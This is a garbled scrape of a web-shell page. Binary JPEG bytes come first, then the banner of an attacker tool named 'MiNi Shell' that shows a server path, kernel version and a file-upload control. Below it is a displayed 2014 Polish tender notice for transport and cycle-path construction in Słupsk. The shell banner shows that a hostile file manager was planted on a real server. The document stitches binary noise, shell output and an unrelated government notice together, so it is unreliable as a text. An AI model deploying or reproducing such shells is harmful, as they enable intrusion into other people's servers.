JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140627/138527-N-2014.html

<p class="kh_header"><b>Słupsk: Wykonanie robót budowlanych w ramach Projektu pn. Wzrost atrakcyjności systemu transportu zbiorowego na obszarze m. Słupska poprzez budowę węzła integracyjnego wraz z infrastrukturą towarzyszącą dostosowaną do potrzeb osób niepełnosprawnych - Etap I.</b><br>
<b>Numer ogłoszenia: 138527 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Infrastruktury Miejskiej w Słupsku , ul. Przemysłowa 73, 76-200 Słupsk, woj. pomorskie, tel. +48 59 841 00 91, faks +48 59 848 37 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zimslupsk.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych w ramach Projektu pn. Wzrost atrakcyjności systemu transportu zbiorowego na obszarze m. Słupska poprzez budowę węzła integracyjnego wraz z infrastrukturą towarzyszącą dostosowaną do potrzeb osób niepełnosprawnych - Etap I..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:1)przebudowę ścieżki rowerowej oraz chodnika po północnej stronie ul. Szczecińskiej na odcinku od ul. 11 Listopada do ul. Sobieskiego, zwaną w dalszej treści SIWZ zadanie I; 2)przebudowę skrzyżowania ulicy Szczecińskiej - Sobieskiego - Krzywoustego oraz skrzyżowania ul. Szczecińskiej  z ul. Grottgera, zwaną w dalszej treści SIWZ zadanie II: 3)przebudowę i budowę ścieżki rowerowej oraz chodnika wzdłuż ulic: 3 Maja, Wolności i Kołłątaja,  zwaną w dalszej treści SIWZ zadanie III;4)przebudowę zatok autobusowych wraz z przystankami na ul. Kołłątaja i ul. Wojska Polskiego, zwaną w dalszej treści SIWZ zadanie IV;5) budowę parkingu dla rowerów Bike & Ride w pasie drogowym ul. Kołłątaja na wysokości  Dworca PKP, zwaną w dalszej treści SIWZ  zadanie V.Dla całości przedmiotu zamówienia Zamawiający posiada aktualne pozwolenie na budowę.Opis  robót budowlanych do wykonania w ramach zadania I:1) w zakresie branży drogowej: 
a) budowa drogi rowerowej bitumicznej koloru czerwonego, o łącznej powierzchni 2.498,3 m2,b) przebudowa i budowa chodników z betonowej kostki wibroprasowanej gr. 6 cm szarej o łącznej  powierzchni 2.908,1 m 2,c) przebudowa i budowa chodników z płyt betonowych z wypustkami 35x35x6 cm, peronów z płyt betonowych 30x30x8 cm, zjazdów z kostki betonowej gr.8 cm grafitowej, zatok autobusowych,
d) rozebranie chodników, wysepek przystankowych i przejść dla pieszych, nawierzchni bitumicznych, nawierzchni z płyt drogowych betonowych, e) wykonanie nakładki antypoślizgowej na przejazdach rowerowych z żywicy poliuretanowej i kruszywa boksytowego,f) montaż krawężników przystankowych, poręczy i balustrad ze stali ocynkowanej, malowanych  proszkowo w kolorze szare aluminium,g) regulacja istniejącej armatury i wymiana pokryw studni teletechnicznych typu ciężkiego,
h) wykonanie stałej i czasowej organizacji ruchu;2) w zakresie branży elektrycznej:
a) relokacja słupów oświetlenia,b) budowa zasilania wiat ;3)w zakresie branży zieleni: 
a) zabezpieczenie drzew i krzewów zlokalizowanych w bezpośrednim sąsiedztwie prac, na czas ich wykonywania, b) wykonanie trawników dywanowych,
c) wysiew nasion traw w ilości 3 kg/100 m2 mieszanką nasion traw o następującym składzie gatunkowym:mietlica pospolita 30%,kostrzewa nitkowata 30%,kostrzewa różnolistna 25%,rajgras angielski 15%,d) roczna pielęgnacja trawników;4) w zakresie małej architektury:a) demontaż i przestawienie, na wskazane przez Zamawiającego miejsce, wiat przystankowych - 2 szt.,b) zakup i montaż ławek przystankowych,c) zakup i montaż wiat przystankowych.Roboty w zakresie małej architektury nie ujęte w dokumentacji, a konieczne do wykonania i wyceny:
a) zakup i montaż ławek parkowych w miejscach wskazanych przez Zamawiającego - 10 szt.,b) zakup i montaż koszy na śmieci w miejscach wskazanych przez Zamawiającego - 5 szt.Opis  robót budowlanych do wykonania w ramach zadania II:
1) w zakresie branży drogowej: a) przebudowa i wzmocnienie istniejącej nawierzchni skrzyżowania po frezowaniu, warstwą MMA układaną na zimno z siatką stalową, o łącznej powierzchni 4.767,0 m2,
b) budowa nawierzchni buspasa z zatoką autobusową, o łącznej powierzchni 169,2 m2, c) budowa nawierzchni lewoskrętu z ul. Sobieskiego, o łącznej powierzchni 259,4 m2,d) przebudowa i budowa chodników z betonowej kostki wibroprasowanej gr. 6 cm szarej, o łącznej powierzchni 517,2 m2,e) przebudowa i budowa chodników z płyt betonowych z wypustkami 35x35x6 cm, peronów z płyt betonowych 30x30x8 cm, zjazdów z kostki betonowej gr.8 cm grafitowej,f) rozebranie chodników, wysepek przystankowych i przejść dla pieszych, nawierzchni bitumicznych, nawierzchni z płyt drogowych betonowych,g) montaż krawężników przystankowych,
h) regulacja istniejącej armatury oraz wymiana pokryw studni teletechnicznych typu ciężkiego;2) w zakresie branży elektrycznej:a) budowa sygnalizacji świetlnej na skrzyżowaniu ulic Szczecińska - Sobieskiego - Krzywoustego i Szczecińska - Grottgera,
b) montaż słupów oświetlenia,c) budowa zasilania wiat;3) w zakresie branży kanalizacji deszczowej:wymiana włazów żeliwnych D400 wraz z kołnierzami na studniach o 1200 mm kan. deszczowej, skrzynek żeliwnych na studzienkach wpustowych , ustawienie studzienek wpustowych, ułożenie przykanalików, rozbiórka wpustów i studzienek deszczowych;4) w zakresie branży zieleni: a) zabezpieczenie drzew i krzewów zlokalizowanych w bezpośrednim sąsiedztwie prac, na czas ich wykonywania,b)wykonanie trawników dywanowych, c) wysiew nasion traw w ilości 3 kg/100 m2 mieszanką nasion traw o następującym składzie gatunkowym:mietlica pospolita 30%,kostrzewa nitkowata 30%,kostrzewa różnolistna  25%,rajgras angielski 15%,d) roczna pielęgnacja trawników;5) w zakresie małej architektury:
a) demontaż i przestawienie, na wskazane przez Zamawiającego miejsce, wiat przystankowych - 1 szt.,b) zakup i montaż ławek przystankowych,c) zakup i montaż wiat przystankowych;6) w zakresie budowy sygnalizacji świetlnej:a) słupy ze stali ocynkowanej malowane proszkowo w kolorze szare aluminium,b) wideodetektory o rozdzielczości minimalnej 1Mpx, zgodne z systemem rejestracji monitoringu, 
c) sygnał z wideodetektorów wprowadzić do w pełni zintegrowanego urządzenia dostępowego outdoor na pasmo 5 GHz z wbudowaną anteną panelową,d) sygnalizatory o następujących parametrach:obudowa aluminiowa monolityczna dla całego sygnalizatora, panel przedni z poliwęglanu  utwardzonego promieniami UV,optyka: LED,odporność na uderzenia klasa IR3 wg EN 60598 1,szczelność  IP54-EN 60529 certyfikat zgodnie z EN12368,klasyfikacja ochrony klasa II podwójna lub wzmocniona izolacja,kolory obudowy szare aluminium, kolor panelu przedniego  czarny, sposób montażu  dwupunktowe,e) przyciski dla pieszych wraz z sygnałem akustycznym dla osób niepełnosprawnych  o następujących parametrach:opływowy kształt obudowy w kolorze żółtym,na obudowie napis czekaj podświetlony diodami LED,przycisk zintegrowany z sygnałem dźwiękowym dla osób niewidzących - podstawowy przy świetle zielonym, pomocniczy przy świetle zielonym migającym, naprowadzający przy świetle  czerwonym oraz akustyczny dźwięk przyjęcia zgłoszenia żądania,sygnał dźwiękowy powinien automatycznie dostosowywać natężenie dźwięku w zależności od  głośności otoczenia oraz posiadać możliwość czasowego wyłączania sygnału,należy zastosować przycisk typu sensorowego (dotykowego),
f) na każdym wlocie skrzyżowania należy zastosować liczniki czasu pozostałego do końca  wyświetlania sygnału zielonego i czerwonego o następujących parametrach:
wyświetlacz dwukolorowy 7 segmentowy, dwuliczbowy pozwalający na wyświetlenie czasu od 99 do 0, o kolorze cyfr aktualnie wyświetlanego sygnału,
możliwość konfigurowania rodzaju odmierzanego czasu- tylko zielonego, tylko czerwonego lub zielonego i czerwonego,wyświetlacz zintegrowany w jednej obudowie z sygnalizatorem.Opis robót budowlanych do wykonania w ramach zadania III:
1)w zakresie branży drogowej: a)budowa drogi rowerowej bitumicznej koloru czerwonego, o łącznej powierzchni 1.778,1 m2,b)przebudowa i budowa chodników z betonowej kostki wibroprasowanej gr. 6 cm, o łącznej powierzchni 2.412,1 m2,
c)rozebranie chodników, wysepek przystankowych i przejść dla pieszych, nawierzchni 
bitumicznych, śr. gr. 3 cm, nawierzchni z kostki betonowej,d)przebudowa i budowa chodników z płyt betonowych z wypustkami 35x35x6 cm, peronów z płyt betonowych 30x30x8 cm, zjazdów z kostki betonowej gr.8 cm grafitowej, zatok autobusowych,
e)montaż krawężników przystankowych,f)wykonanie poręczy i balustrad ze stali nierdzewnej, barier mostowych U14a, nakładki antypoślizgowej na przejazdach rowerowych z żywicy poliuretanowej i kruszywa boksytowego,g)regulacja istniejącej armatury i wymiana pokryw studni teletechnicznych typu ciężkiego,h)wykonanie stałej i czasowej organizacji ruchu;2) w zakresie branży elektrycznej:a) przebudowa słupów oświetlenia ulic,b) budowa zasilania wiat;3) w zakresie branży zieleni:
a) zabezpieczenie drzew i krzewów zlokalizowanych w bezpośrednim sąsiedztwie prac, na czas ich wykonywania, b) wykonanie trawników dywanowych,c) wysiew nasion traw w ilości 3 kg/100 m2 mieszanką nasion traw o następującym składzie gatunkowym:mietlica pospolita 30%,kostrzewa nitkowata  30%,kostrzewa różnolistna  25%,rajgras angielski  15%,d) prace pielęgnacyjne w istniejącym drzewostanie (podana niżej numeracja odpowiada numeracji  w projekcie zieleni  zad. 3, 4, 5, rys. 1.1.),pkt 1) skupina głogów, klonów, bez czarny  20 szt., prace pielęgnacyjne polegające na podniesieniu korony, usunięciu posuszu, średnica cięć do 30 cm,pkt 2) świerk pospolity  8 szt., podniesienie koron drzew,pkt 3) klon pospolity - 1 szt., podniesienie korony, usunięcie posuszu i odrostów,pkt 4 i 6) karczowanie drzew owocowych, średnica pnia do 40 cm  9 szt.,pkt 5) skupina klonów, głogów  40 m2, podniesienie korony, usunięcie posuszu i odrostów,e) roboty w zakresie zieleni nie ujęte w dokumentacji, a konieczne do wykonania i wyceny:
cięcia pielęgnacyjne  berberys Thunberga  5 m2 (za wiatą przystankową przy ul Fabrycznej),cięcia pielęgnacyjne - kalina koralowa - 4 m2 ( przed wiatą przystankową, przy ul. Fabrycznej,  przy schodach),cięcia pielęgnacyjne skupiny  lilak  55 m2 ( za wiaduktem, przed skrętem w ul. Kołłątaja),usunięcie konarów wychodzących poza granicę prywatnych posesji, usunięcie odrostów, samosiewów - śliwa ozdobna, klony, leszczyna - 20 szt.,f) roczna pielęgnacja trawników;
4) w zakresie małej architektury: a) demontaż i przestawienie, na wskazane przez Zamawiającego miejsce, wiat przystankowych - 1 szt., b) zakup i montaż ławek przystankowych,c) zakup i montaż wiat przystankowych ,
Roboty w zakresie małej architektury nie ujęte w dokumentacji, a konieczne do wykonania i wyceny:a) zakup i montaż ławek parkowych w miejscach wskazanych przez Zamawiającego - 12 szt.,b) zakup i montaż koszy na śmieci w miejscach wskazanych przez Zamawiającego - 8 szt.Opis robót budowlanych do wykonania w ramach zadania IV:1)w zakresie branży drogowej: a)przebudowa i budowa chodników z betonowej kostki wibroprasowanej gr. 6 cm, szarej, o łącznej powierzchni 511,5 m2,
b)przebudowa zatok autobusowych, o łącznej powierzchni 260,4 m2,c)przebudowa peronów z płyt betonowych 30x30x8 cm, zjazdów z kostki betonowej gr.8 cm 
grafitowej,d)rozebranie chodników, wysepek przystankowych,  przejść dla pieszych, nawierzchni  z kostki kamiennej, nawierzchni z kostki betonowej,e)montaż krawężników przystankowych,f)wykonanie poręczy i balustrad ze stali nierdzewnej,
g)regulacja istniejącej armatury i wymiana pokryw studni teletechnicznych typu ciężkiego,h)wykonanie stałej organizacji ruchu;2)w zakresie branży elektrycznej:
budowa zasilania wiat;3) w zakresie branży zieleni:a)zabezpieczenie drzew i krzewów zlokalizowanych w bezpośrednim sąsiedztwie prac, na czas ich wykonywania,
b)wykonanie trawników dywanowych,c)wysiew nasion traw w ilości 3 kg/100 m2 mieszanką nasion traw o następującym składzie gatunkowym:mietlica pospolita  30 %,
kostrzewa nitkowata 30 %,kostrzewa różnolistna  25 %,rajgras angielski 15 %,
d)roczna pielęgnacja trawników;4)w zakresie małej architektury: a) demontaż i przestawienie, na wskazane przez Zamawiającego miejsce, wiat przystankowych  3 szt., b) zakup i montaż ławek przystankowych,c) zakup i montaż wiat przystankowych.
Opis robót budowlanych do wykonania w ramach zadania V:1)  w zakresie branży drogowej: a) budowa nawierzchni z kostki brukowej betonowej czerwonej, o łącznej powierzchni 68,3 m2,b) rozebranie chodników, wysepek przystankowych i przejść dla pieszych oraz tablicy ogłoszeniowej;2)w zakresie branży elektrycznej:a) budowa zasilania wiaty,b) budowa monitoringu CCTV wiaty, o liczbie kamer 4 szt. (3 wewnętrzne i 1 zewnętrzna);3)w zakresie branży zieleni:a) zabezpieczenie drzew i krzewów zlokalizowanych w bezpośrednim sąsiedztwie prac, na czas ich wykonywania, 
b) wykonanie trawników dywanowych,c) wysiew nasion traw w ilości 3 kg/100 m2 mieszanką nasion traw o następującym składzie gatunkowym:mietlica pospolita 30 %,
kostrzewa nitkowata 30 %,kostrzewa różnolistna  25 %,rajgras angielski  15 %,
d)  roczna pielęgnacja trawników;4)w zakresie małej architektury: a) zakup i montaż wiaty rowerowej,b) zakup i montaż stojaków rowerowych typu U  ze stali nierdzewnej, o średnicy 60 mm.Szczegółowy zakres robót określa dokumentacja projektowa oraz Szczegółowe Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych opracowane przez NORD PROJEKT Andrzej Kaźmierczak, ul. Wrocławska 7, 84-232 Rumia. Dokumenty te stanowią integralną część SIWZ. 
Dodatkowe informacje niezbędne do wyceny oferty i wykonania zamówienia:
1)Wykonawca wykona i zamontuje dwustronne tablice informacyjne - 6 szt. w celach promocyjnych Projektu. W przypadku zmiany wartości dofinansowania dla Projektu należy każdorazowo dokonać aktualizacji danych finansowych zamieszczonych na tablicy informacyjnej.Wymiary tablicy informacyjnej: 3,0 m x 2,0 m.
2)Wykonawca wykona i zamontuje dwustronne tablice pamiątkowe - 6 szt. w celach promocyjnych Projektu. Wymiary tablicy pamiątkowej: 1,0 m x 0,7 m.
3)Szczegóły tablic określają  Wytyczne dotyczące promocji projektów UE dla beneficjentów  Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2007-2013, które znajdują się na stronie internetowej Departamentu Projektów Regionalnych Urzędu Marszałkowskiego Województwa Pomorskiego (http://dpr.pomorskie.eu/)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8, 45.23.30.00-9, 45.23.31.30-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 80.000 PLN (słownie: osiemdziesiąt tysięcy PLN). 
Wadium należy wnieść przed upływem terminu składania ofert w formie określonej w art. 45 ust. 6 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna udokumentowanie wykonania w okresie ostatnich pięciu lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej w zakresie budowy, przebudowy lub remontu dróg o nawierzchni    z masy mineralno - bitumicznej wraz z budową lub przebudową drogi rowerowej z masy mineralno- bitumicznej oraz budową lub przebudową sygnalizacji świetlnej na drogach klasy min. Z, o wartości nie niższej niż 3.000.000 PLN, w sposób należyty,
lub jednej roboty budowlanej w zakresie budowy, przebudowy lub remontu dróg o nawierzchni z masy mineralno - bitumicznej wraz z budową lub przebudową drogi rowerowej z masy  mineralno -  bitumicznej i jednej roboty w zakresie budowy lub przebudowy sygnalizacji świetlnej   na drogach  klasy min. Z, o łącznej wartości nie niższej niż 3.000.000 PLN, w sposób należyty,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna udokumentowanie dysponowaniem osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie i uprawnienia, odpowiednie do zakresu wykonywanych przez nie czynności, w tym co najmniej:
a)jedną osobą na stanowisko Kierownika budowy -  posiadającą uprawnienia budowlane do kierowania robotami w specjalności drogowej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, minimum 5-cio letnie doświadczenie przy realizacji robót w branży drogowej i minimum 3-letnie doświadczenie na stanowisku kierownika budowy lub kierownika robót branży drogowej;
b)jedną osobą na stanowisko Kierownika robót branży elektrycznej - posiadającą uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektro-energetycznych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, minimum 5-cio letnie doświadczenie przy realizacji robót branży elektrycznej i minimum 3-letnie doświadczenie na stanowisku kierownika budowy lub robót branży elektrycznej; 
c)jedną osobą na stanowisko Kierownika robót branży sanitarnej  -  posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci, instalacji  i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, minimum 5-cio letnie doświadczenie przy realizacji robót branży sanitarnej  i minimum 3-letnie doświadczenie na stanowisku kierownika budowy lub robót branży sanitarnej;
d)jedną osobą z wykształceniem wyższym ogrodniczym lub jedną osobą z wykształceniem architekta krajobrazu                 lub                                                                                                               jedną osobą z  kwalifikacjami gospodarza terenów zieleni (ukończony kurs na poziomie  II stopnia NOT) lub równoważne kwalifikacje wydawane w innych państwach członkowskich, która posiada minimum 3-letnie doświadczenie przy realizacji inwestycji w zakresie wykonywania prac związanych z zakładaniem zieleni ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

